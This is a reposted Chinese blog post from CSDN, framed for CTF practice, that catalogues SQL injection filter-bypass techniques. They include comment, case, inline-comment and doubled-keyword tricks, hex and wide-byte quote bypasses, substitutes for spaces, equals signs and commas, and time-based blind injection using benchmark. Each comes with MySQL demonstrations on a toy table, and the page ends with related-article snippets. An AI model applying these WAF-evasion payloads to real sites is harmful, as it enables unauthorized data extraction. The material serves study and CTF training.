sql注入绕过方法总结

最新推荐文章于 2024-09-18 17:30:03 发布
最新推荐文章于 2024-09-18 17:30:03 发布
阅读量2.7k 收藏 17
点赞数 3
分类专栏: 漏洞整理 SQL注入 文章标签: 安全 web安全
原文链接:https://blog.csdn.net/huanghelouzi/article/details/82995313?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165540922416782395335886%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=165540922416782395335886&biz_id=0&utm_me
版权

转至:sql注入绕过方法总结_huanghelouzi的博客-CSDN博客_sql绕过

前言

SQL在CTF每一次比赛中基本上都会出现,所以有了这一篇总结,防忘,最后更新于2018/10/11。

简而言之:SQL注入用户输入的数据变成了代码被执行

    string sql = "select id,no from user where id=" + id;

 我们希望用户输入的 id 的值,仅仅是一个字符串,传入数据库执行,但是当输入了: 2 or 1=1 时,其中的 or 1=1 是作为了 sql语句 来执行的。

sql注入绕过

注释符号绕过

常用的注释符有

-- 注释内容
# 注释内容
/*注释内容*/
;

 实例

mysql> select * from users -- where id = 1;
    -> ;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
|  2 | user2    | pass1    |

mysql> select * from users # where id = 2;
    -> ;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
|  2 | user2    | pass1    |

mysql> select * from users where id = 3 /*+1*/
    -> ;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  3 | test3    | pass1    |
+----+----------+----------+
1 row in set (0.00 sec)

大小写绕过

常用于 waf的正则对大小写不敏感的情况,一般都是题目自己故意这样设计。
例如:waf过滤了关键字select,可以尝试使用Select等绕过。

mysql> select * from users where id = -1 union select 1,2,3
    -> ;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | 2        | 3        |
+----+----------+----------+
1 row in set (0.00 sec)

#大小写绕过
mysql> select * from users where id = -1 union Select 1,2,3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | 2        | 3        |
+----+----------+----------+

内联注释绕过

内联注释就是把一些特有的仅在MYSQL上的语句放在 /*!...*/ 中,这样这些语句如果在其它数据库中是不会被执行,但在MYSQL中会执行。

mysql> select * from users where id = -1 union /*!select*/ 1,2,3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | 2        | 3        |
+----+----------+----------+

双写关键字绕过

在某一些简单的waf中,将关键字select等只使用replace()函数置换为空,这时候可以使用双写关键字绕过。例如select变成seleselectct,在经过waf的处理之后又变成select,达到绕过的要求。

特殊编码绕过

  • 十六进制绕过
mysql> select * from users where username = 0x7465737431;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+
  • ascii编码绕过
    Test 等价于
    CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)
    tip:好像新版mysql不能用了

空格过滤绕过

一般绕过空格过滤的方法有以下几种方法来取代空格

/**/
()
回车(url编码中的%0a)
`(tap键上面的按钮)
tap
两个空格

mysql> select/**/*/**/from/**/users;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
|  2 | user2    | pass1    |
|  3 | test3    | pass1    |
+----+----------+----------+

#注意括号中不能含有*
mysql> select(id)from(users);
+----+
| id |
+----+
|  1 |
|  3 |


mysql> select
    -> *
    -> from 
    -> users
    -> where 
    -> id = 1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+

mysql> select`id`from`users`where`id`=1;
+----+
| id |
+----+
|  1 |
+----+

过滤or and xor not 绕过

and = &&
or = ||
xor = | # 异或
not = !

过滤等号=绕过

不加通配符like执行的效果和=一致,所以可以用来绕过。

正常加上通配符的like

mysql> select * from users where username like "test%";
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
|  3 | test3    | pass1    |
+----+----------+----------+

不加上通配符的like可以用来取代=

mysql> select * from users where id like 1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+

rlike:模糊匹配,只要字段的值中存在要查找的 部分 就会被选择出来
用来取代=时,rlike的用法和上面的like一样,没有通配符效果和=一样

mysql> select * from users where id rlike 1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+

regexp:MySQL中使用 REGEXP 操作符来进行正则表达式匹配

mysql> select * from users where id regexp 1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+

使用大小于号来绕过

mysql> select * from users where id > 1 and id < 3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  2 | user2    | pass1    |
+----+----------+----------+

<> 等价于 !=
所以在前面再加一个!结果就是等号了

mysql> select * from users where !(id <> 1);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where id = 1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+
1 row in set (0.00 sec)

等号绕过也可以使用strcmp(str1,str2)函数、between关键字等,具体可以参考后面的过滤大小于号绕过
过滤大小于号绕过

在sql盲注中,一般使用大小于号来判断ascii码值的大小来达到爆破的效果。但是如果过滤了大小于号的话,那就凉凉。怎么会呢,可以使用以下的关键字来绕过

    greatest(n1, n2, n3…):返回n中的最大值

mysql> select * from users where id = 1 and greatest(ascii(substr(username,1,1)),1)=116;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+

  • least(n1,n2,n3…):返回n中的最小值

  • strcmp(str1,str2):若所有的字符串均相同,则返回STRCMP(),若根据当前分类次序,第一个参数小于第二个,则返回 -1,其它情况返回 1

mysql> select * from users where id = 1 and strcmp(ascii(substr(username,1,1)),117);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where id = 1 and strcmp(ascii(substr(username,1,1)),116);
Empty set (0.00 sec)
  • in关键字
mysql> select * from users where id = 1 and substr(username,1,1) in ('t');
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+
1 row in set (0.01 sec)

mysql> select * from users where id = 1 and substr(username,1,1) in ('y');
Empty set (0.00 sec)
  • between a and b:范围在a-b之间
mysql> select * from users where id between 1 and 2;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
|  2 | user2    | pass1    |
+----+----------+----------+
2 rows in set (0.00 sec)

mysql> select * from users where id = 1 and substr(username,1,1) between 'a' and 'b';
Empty set (0.00 sec)

mysql> select * from users where id = 1 and substr(username,1,1) between 'a' and 't';
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+
1 row in set (0.00 sec)

使用between a and b判等

mysql> select * from users where id = 1 and substr(username,1,1) between 't' and 't';
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+

过滤引号绕过

  • 使用十六进制
select column_name  from information_schema.tables where table_name=0x7573657273;
  • 宽字节

常用在web应用使用的字符集为GBK时,并且过滤了引号,就可以试试宽字节。

# 过滤单引号时
%bf%27 %df%27 %aa%27

%df\’ = %df%5c%27=縗’

过滤逗号绕过

sql盲注时常用到以下的函数:

substr()
        substr(string, pos, len):从pos开始,取长度为len的子串
        substr(string, pos):从pos开始,取到string的最后
substring()
        用法和substr()一样
mid()
        用法和substr()一样,但是mid()是为了向下兼容VB6.0,已经过时,以上的几个函数的pos都是从1开始的
left()和right()
        left(string, len)和right(string, len):分别是从左或从右取string中长度为len的子串
limit
        limit pos len:在返回项中从pos开始去len个返回值,pos的从0开始
ascii()和char()
        ascii(char):把char这个字符转为ascii码
        char(ascii_int):和ascii()的作用相反,将ascii码转字符

回到正题,如果waf过滤了逗号,并且只能盲注(盲注基本离不开逗号啊喂),在取子串的几个函数中,有一个替代逗号的方法就是使用from pos for len,其中pos代表从pos个开始读取len长度的子串
例如在substr()等函数中,常规的写法是

mysql> select substr("string",1,3);
+----------------------+
| substr("string",1,3) |
+----------------------+
| str                  |
+----------------------+

如果过滤了逗号,可以这样使用from pos for len来取代

mysql> select substr("string" from 1 for 3);
+-------------------------------+
| substr("string" from 1 for 3) |
+-------------------------------+
| str                           |
+-------------------------------+
1 row in set (0.00 sec)

在sql盲注中,如果过滤逗号,以下参考下面的写法绕过

mysql> select ascii(substr(database() from 1 for 1)) > 120;
+----------------------------------------------+
| ascii(substr(database() from 1 for 1)) > 120 |
+----------------------------------------------+
|                                            0 |
+----------------------------------------------+
1 row in set (0.00 sec)

mysql> select ascii(substr(database() from 1 for 1)) > 110;
+----------------------------------------------+
| ascii(substr(database() from 1 for 1)) > 110 |
+----------------------------------------------+
|                                            1 |
+----------------------------------------------+

也可使用join关键字来绕过

mysql> select * from users  union select * from (select 1)a join (select 2)b join(select 3)c;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
|  2 | user2    | pass1    |
|  3 | test3    | pass1    |
|  1 | 2        | 3        |
+----+----------+----------+

其中的

union select * from (select 1)a join (select 2)b join(select 3)c

等价于

union select 1,2,3

使用like关键字
适用于substr()等提取子串的函数中的逗号

mysql> select ascii(substr(user(),1,1))=114;
+-------------------------------+
| ascii(substr(user(),1,1))=114 |
+-------------------------------+
|                             1 |
+-------------------------------+

mysql> select user() like "r%";
+------------------+
| user() like "r%" |
+------------------+
|                1 |
+------------------+

mysql> select user() like "t%";
+------------------+
| user() like "t%" |
+------------------+
|                0 |
+------------------+

使用offset关键字
适用于limit中的逗号被过滤的情况
limit 2,1等价于limit 1 offset 2

mysql> select * from users limit 2,1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  3 | test3    | pass1    |
+----+----------+----------+

mysql> select * from users limit 1 offset 2;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  3 | test3    | pass1    |
+----+----------+----------+

过滤函数绕过

  • sleep() -->benchmark()
mysql> select 12,23 and sleep(1);
+----+-----------------+
| 12 | 23 and sleep(1) |
+----+-----------------+
| 12 |               0 |
+----+-----------------+
1 row in set (1.00 sec)

# MySQL有一个内置的BENCHMARK()函数,可以测试某些特定操作的执行速度。 
参数可以是需要执行的次数和表达式。第一个参数是执行次数,第二个执行的表达式
mysql> select 12,23 and benchmark(1000000000,1);
+----+--------------------------------+
| 12 | 23 and benchmark(1000000000,1) |
+----+--------------------------------+
| 12 |                              0 |
+----+--------------------------------+
1 row in set (4.61 sec)
  • ascii()–>hex()、bin()
    替代之后再使用对应的进制转string即可
  • group_concat()–>concat_ws()
mysql> select group_concat("str1","str2");
+-----------------------------+
| group_concat("str1","str2") |
+-----------------------------+
| str1str2                    |
+-----------------------------+
1 row in set (0.00 sec)

#第一个参数为分隔符
mysql> select concat_ws(",","str1","str2");
+------------------------------+
| concat_ws(",","str1","str2") |
+------------------------------+
| str1,str2                    |
+------------------------------+
  • substr(),substring(),mid()可以相互取代, 取子串的函数还有left(),right()
  • user() --> @@user、datadir–>@@datadir
  • ord()–>ascii():这两个函数在处理英文时效果一样,但是处理中文等时不一致。
nigo134
关注
专栏目录
sql注入-绕过过滤空格
MichealCurry1的博客
10-09 2994
空格可以用/**/,%20替换
随时补充SQL注入绕过
weixin_44722125的博客
05-13 740
做CTF题的时候才发现自己会的注入姿势太少了 专开一篇随时补充sql注入 1.绕过空格(注释符/* /,%a0):   两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /!/ 最基本的绕过方法,用注释替换空格: / 注释 */ 使用浮点数: select * from users where id=8E0unio...
SQL注入秘籍【绕过篇】
大河之犬的博客
03-22 1865
另一种方法是使用CLR,MSSQL CLR 是一项功能,允许在 SQL Server 数据库上运行托管代码,包括 C# 和 Visual Basic。编码无非就是hex、url等等编码,让传到数据库的数据能够解析的即可,比如URL编码一般在传给业务的时候就会自动解码。,他的作用是对表的自增ID进行监控,也就是说,如果某张表存在自增ID,就可以通过该视图来获取其表名和所在数据库名。来替代空格,也可以混合使用(规律有不同,可以自己本地尝试),是直接使用cmd /c来执行命令的,会被360拦截,可以用。
SQL注入学习笔记(二)
最新发布
weixin_68491709的博客
09-18 430
需要注意的点是当’or‘被过滤时,那么’information‘,’order‘,’password‘此类关键词中间含’or‘的极大可能也无法正常使用,因此应双写为’infoorrmation‘,’oorrder‘,’passwoorrd‘。若数字回显字母不回显,说明有一个‘或’结构,而且不直接回显flag,但作为一道题目,from一定是from flag。原理在于故意构造可报错语句,让错误信息中夹杂可以显示数据库内容的查询语句,从而返回报错提示,内含数据库中的内容。(3)通过floor()报错注入。
SQL注入绕过
anlalu233的博客
10-18 386
注释符号绕过 大小写绕过 双写绕过 编码绕过 <>绕过空格绕过 对or/and的绕过 对等号=的绕过 对单引号的绕过 对逗号的绕过 过滤函数绕过 ...
SQL绕过
m0_47599604的博客
12-17 165
WAF绕过 技巧: 1.大小写绕过 eg:union UnIon 2.双写绕过 3.编码绕过 eg:URL编码 4.内联注释绕过 # --+ /*! */ 5.溢出绕过 6.%df宽字节绕过 7./**/注释'%0b''+''||'用这些符号来分割关键词 8.注释符+%0a绕过换行 命令语句: ...
SQL注入绕过的技巧总结
09-09
总结来说,SQL注入绕过技术需要根据目标系统的具体过滤规则来灵活应用。随着安全技术的发展,虽然SQL注入已不像以前那样普遍,但仍然存在很多未修补的漏洞。因此,开发人员应始终确保对用户输入进行充分验证和过滤,...
关于SQL注入绕过的一些知识点
09-09
网上关于SQL注入绕过技巧有很多,最近正好空下来,想着整理下关于SQL注入绕过的一些姿势。欢迎大牛补充,下面这篇文章主要介绍了关于SQL注入绕过的一些知识点,总结的还是相对比较全面的,需要的朋友可以参考下。
有效防止SQL注入的5种方法总结
09-09
SQL注入是一种严重的网络安全威胁,它利用开发者在编程时未充分考虑输入验证的漏洞,通过构造恶意的SQL语句,攻击者可以绕过权限控制,获取敏感数据,甚至篡改数据库内容。以下是对防止SQL注入的五种方法的详细说明...
SQL注入绕过空格
nihao_ma_的博客
05-07 2121
SQL注入空格绕过技巧
SQL注入实战:绕过操作
ting_liang的博客
01-27 2917
preg replace(mixed $pattern, mixed $replacement, mixed$subject):执行-个正则表达式的搜索和替换。id=1 && 1=1或者?可以利用网络中的开源的URL在线编码,绕过SQL注入的过滤机制。1、大小写变形,Or,OR,oR,And,ANd,aND等-代码中大小写不敏感都剔除。3、利用符号代替--and --&& --or--|| 等。5、网站的每个数据层的编码统一,建议全部使用utf-8编码。
SQL注入绕过技术
Likhaooo的博客
02-04 4711
SQL注入绕过技术 文章目录SQL注入绕过技术1空格字符绕过2.大小写绕过3.浮点数绕过注入4.NULL值绕过5.引号绕过6.添加库名绕过7.去重复绕过8.反引号绕过9. 脚本语言特性绕过10. 逗号绕过11. substr 截取字符串12. min 截取字符串13. 使用 join 绕过 SQL 注入绕过技术 已经是一个老生常谈的内容了,防注入可以使用某些云 waf加速乐等安全产品,这些产品会自带 waf 属性拦截和抵御 SQL 注入,也有一些产品会在服务器里安装软件,例如 iis 安全狗、d 盾、还有就
SQL注入绕过空格过滤
热门推荐
gam0n的博客
06-05 1万+
一、通过注释绕过空格注释即/**/通过注释取代空格eg:  or/**/'me'/**/=/**/'isme'二、通过括号绕过空格eg: and(1=0)
[SQL注入]CTFshow-----WEB6(空格绕过
菜鸟的博客
07-25 380
sql注入的步骤:先查表再查字段后查数据 输入万能密码 1' #抓包发现报错 去掉之后发现正常,这我想到了空格绕过/**/ 万能登陆密码登录 检测回显位置—得到回显位为2 查表,得表名flag,user 构造语句:select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database() 查字段/列名,得列名’flag' 查数据 ...
sql 过滤 绕过
m0_59855041的博客
06-14 818
20%0a%a0%09%0C%0D%0B()/**/
CTFhub-sql注入-绕过空格过滤
ssss39的博客
08-19 498
如果1/**/union/**/select/**/1=1的显示结果与1/**/union/**/select/**/1=2的显示结果不一样,1/**/union/**/select/**/1,2 没有将数据带出来。3 没有回显,说明只用 1,2 这两个。与1的结果一样说明存在注入点。字段名dzkctujmta。
SQL注入-绕过篇】
m0_62373986的博客
08-29 843
绕过\的关键点在于网站在对输入数据进行处理时,只进行了一次URL编码,所以将%25转化成%后,不会再检查后面的%27。1、宽字节注入在上一篇博客讲到,是因%df+%5c结合为一个宽字节因为GBK编码组合成一个汉字,从而使\失效。2、除此之外,若\没有被网站过滤,也可以利用\对字符的转义来进行SQL注入。网站初次检测用户输入%2527,因为URL编码将%25转化成%,此时用户输入未检测到特殊字符,直接将%27输入到数据库中。2、若\没有被过滤,使用\令闭合符失效。1、宽字节绕过(%df%5c)
sql绕过技巧
weixin_55821558的博客
05-05 1867
sql绕过的方式一般有如下几种: 1.大小写绕过 2.堆叠绕过 3.编码绕过 4.内联注释 常见绕过空格: 1.用注释替换空格 select/**/user,password/**/from /**/users; 2.空格url编码%20 3.两个空格代替一个空格 4.用Tab代替空格 5.%a0=空格 6.如果空格被过滤,括号没有被过滤,可以用括号绕过 select(user())from dual where(1=1)and(2=2) 7.回车 绕引号 使用十六进制如下图: sele
SQL注入绕过技巧与WAF、D盾防范策略详解
资源摘要信息:"sql注入绕过方法总结" 在当今的网络环境中,SQL注入是一种常见而危险的攻击方式,它允许攻击者通过在Web表单输入或查询字符串中注入恶意SQL代码来控制后端数据库。成功的SQL注入可以导致数据泄露、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值